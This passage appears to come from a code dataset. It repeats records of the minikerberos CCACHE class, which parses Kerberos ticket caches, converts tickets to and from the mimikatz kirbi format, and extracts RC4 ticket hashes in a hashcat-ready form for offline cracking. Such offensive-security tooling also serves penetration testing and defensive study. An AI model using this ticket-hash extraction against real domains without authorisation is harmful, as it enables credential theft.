all_hashes: overrides the encryption type filtering and returns hash for all tickets | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L578-L590 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.from_kirbidir | python | def from_kirbidir(directory_path):
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L638-L650 | [
"def add_kirbi(self, krbcred, override_pp = True, include_expired = False):\n\tc = Credential()\n\tenc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native\n\tticket_info = enc_credinfo['ticket-info'][0]\n\n\t\"\"\"\n\tif ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):\n\t\tif... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_kirbidir | python | def to_kirbidir(self, directory_path):
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L652-L665 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_file | python | def to_file(self, filename):
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | Writes the contents of the CCACHE object to a file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L674-L679 | [
"def to_bytes(self):\n\tt = self.file_format_version.to_bytes(2, byteorder='big', signed=False)\n\n\tt_hdr = b''\n\tfor header in self.headers:\n\t\tt_hdr += header.to_bytes()\n\n\tt += len(t_hdr).to_bytes(2, byteorder='big', signed=False)\n\tt += t_hdr\n\n\tt += self.primary_principal.to_bytes()\n\tfor cred in sel... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
